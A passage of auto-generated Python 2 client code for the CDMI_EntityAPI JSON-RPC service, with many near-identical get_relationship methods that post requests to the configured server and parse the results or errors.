arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsExecutedAs',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsExecutionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsExecutionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsExemplarOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsExemplarOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAsExemplar(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAsExemplar',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsFamilyFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsFamilyFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DeterminesFunctionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DeterminesFunctionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsFormedOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsFormedOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsFormedInto(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsFormedInto',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsFunctionalIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsFunctionalIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasFunctional(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasFunctional',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsGroupFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsGroupFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInGroup(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInGroup',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsGroupingOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsGroupingOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_InAssociationDataset(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_InAssociationDataset',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsImplementedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsImplementedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Implements(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Implements',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInOperon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInOperon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OperonContains(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OperonContains',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInPair(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInPair',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsPairOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsPairOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInstantiatedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInstantiatedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInstanceOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInstanceOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsLocatedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsLocatedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsLocusFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsLocusFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsMeasurementMethodOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsMeasurementMethodOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasMeasuredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasMeasuredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModeledBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModeledBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Models(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Models',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModifiedToBuildAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModifiedToBuildAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModificationOfAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModificationOfAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModifiedToBuildTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModifiedToBuildTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModificationOfTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModificationOfTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsOwnerOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsOwnerOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsOwnedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsOwnedBy',
